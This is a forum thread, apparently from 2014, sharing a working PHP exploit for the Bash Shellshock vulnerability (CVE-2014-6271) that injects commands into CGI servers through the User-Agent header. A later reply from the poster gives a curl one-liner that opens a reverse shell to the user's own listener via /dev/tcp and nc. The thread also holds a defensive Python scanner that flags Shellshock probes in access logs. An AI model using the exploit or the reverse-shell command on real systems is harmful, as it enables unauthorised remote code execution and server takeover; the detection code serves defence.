C4r1st posted on 2014-9-25 15:20:57

[CVE-2014-6271] Bash remote code execution vulnerability (exploit attached)

This post was last edited by C4r1st on 2014-9-26 10:55

http://www.exploit-db.com/exploits/34766/
Usage: php bash.php -u http://localhost/cgi-bin/hello -c "wget http://xx.xxx -O /tmp/shit"
<?php
/*
Title: Bash Specially-crafted Environment Variables Code Injection Vulnerability
CVE: 2014-6271
Vendor Homepage: http://www.gnu.org/software/bash/
Author: Prakhar Prasad && Subho Halder
Author Homepage: http://prakharprasad.com && http://appknox.com
Date: September 25th 2014
Tested on: Mac OS X 10.9.4/10.9.5 with Apache/2.2.26
       GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)
Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
       Eg. php bash.php -u http://localhost/cgi-bin/hello -c "wget http://appknox.com -O /tmp/shit"
Reference: http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/

Test CGI Code : #!/bin/bash
      echo "Content-type: text/html"
      echo ""
      echo "Bash-is-Vulnerable"

*/
error_reporting(0);
if(!defined('STDIN')) die("Please run it through command-line!\n");
$x= getopt("u:c:");
if(!isset($x['u']) || !isset($x['c']))
{
die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");

}
$url = $x['u'];
$cmd = $x['c'];

    $context = stream_context_create(
      array(
            'http' => array(
                'method'=> 'GET',
                'header'=> 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
            )
      )
    );
   
    if(!file_get_contents($url, false, $context) && strpos($http_response_header,"500") > 0)
    die("Command sent to the server!\n");
    else
    die("Connection Error\n");
?>

Related links:
http://marc.info/?l=oss-security&m=141157106132018&w=2
http://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
http://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/650
http://blog.erratasec.com/2014/09/bash-bug-as-big-as-heartbleed.html#.VCNKRufIZWN
http://pastebin.com/8NRv7s1Z
http://pastebin.com/kQ5ppEZD
http://www.csoonline.com/article/2687265/application-security/remote-exploit-in-bash-cve-2014-6271.html
http://permalink.gmane.org/gmane.comp.security.oss.general/13852?utm_source=twitterfeed&utm_medium=twitter

PS: ModSecurity states that it has already updated its filtering rules for CVE-2014-6271.
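
A detection-side counterpart to the ModSecurity note above, as an added example that is not part of the original post or of the exploit-db code: it scans Apache combined-format access logs for the `() {` function-definition prefix in the request line, Referer, or User-Agent. The log lines, the regexes, and the function name `find_shellshock_probes` are constructed for illustration.

```python
import re

# Apache "combined" format:
#   ip ident user [time] "request" status bytes "referer" "user-agent"
# Quoted fields may contain backslash-escaped quotes (\"), so allow them.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    + QUOTED.replace('(', '(?P<request>', 1) + r' (?P<status>\d{3}) \S+ '
    + QUOTED.replace('(', '(?P<referer>', 1) + ' '
    + QUOTED.replace('(', '(?P<agent>', 1)
)

# Header values reach a CGI script as HTTP_* environment variables, and a
# vulnerable bash parses a value starting with "() {" as a function definition.
# Matching the prefix anywhere, with flexible whitespace, is deliberately
# conservative; "()" without a following "{" is not flagged.
FUNC_PREFIX_RE = re.compile(r'\(\s*\)\s*\{')

def find_shellshock_probes(lines):
    """Return (line_no, client_ip, field, status) for every suspicious field."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("request", "referer", "agent"):
            if FUNC_PREFIX_RE.search(m.group(field)):
                hits.append((lineno, m.group("ip"), field, m.group("status")))
    return hits

# Constructed sample log lines (documentation IP ranges, harmless marker command).
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:15:20:57 +0800] "GET /cgi-bin/hello HTTP/1.1" 200 19 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [25/Sep/2014:15:21:03 +0800] "GET /cgi-bin/hello HTTP/1.1" 500 613 "-" "() { :;}; /bin/bash -c \\"echo constructed-marker\\""',
    '203.0.113.5 - - [25/Sep/2014:15:21:09 +0800] "GET /index.html HTTP/1.1" 200 1024 "()  {  x; }; echo constructed-marker" "curl/7.30.0"',
    '192.0.2.44 - - [25/Sep/2014:15:21:15 +0800] "GET / HTTP/1.1" 200 512 "-" "ExampleBot/1.0 (+http://example.com/bot())"',
]

if __name__ == "__main__":
    for lineno, ip, field, status in find_shellshock_probes(SAMPLE_LOG):
        print(f"line {lineno}: {ip} sent '() {{' in {field} (HTTP {status})")
```

A hit that coincides with a 500 response on a `/cgi-bin/` path deserves priority review, since the script above treats a 500 as the sign that its command reached the server.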

终古闲情归落照 posted on 2014-9-25 15:34:20

Got it, thanks, OP.

岛主黄药师 posted on 2014-9-25 22:28:13

Thanks, got it :)

ansbase posted on 2014-9-26 08:17:09

Please tell us, how to use it?

C4r1st posted on 2014-9-26 09:53:55

ansbase posted on 2014-9-26 08:17
Please tell us, how to use it?

curl http://xxx.xxx.xxx.xxx/cgi-bin/vulnerable -A "() { :;}; /bin/sh -i >& /dev/tcp/REVERSE_SHELL_IP/PORT 0>&1"
Replace REVERSE_SHELL_IP with your public IP and PORT with the port, and listen with nc.

蓝色_ posted on 2014-9-26 20:35:32

If nobody gives this a like, that's on all of you.

fl0at posted on 2014-9-26 23:37:28

Thanks for sharing!

葬訫 posted on 2014-9-27 16:18:58

Very good, keep it up.

ghostman posted on 2014-9-29 10:09:38

So you have to put your own file online?

heiwu98 posted on 2014-9-30 22:24:36

Thanks to the OP for sharing! Off to study it!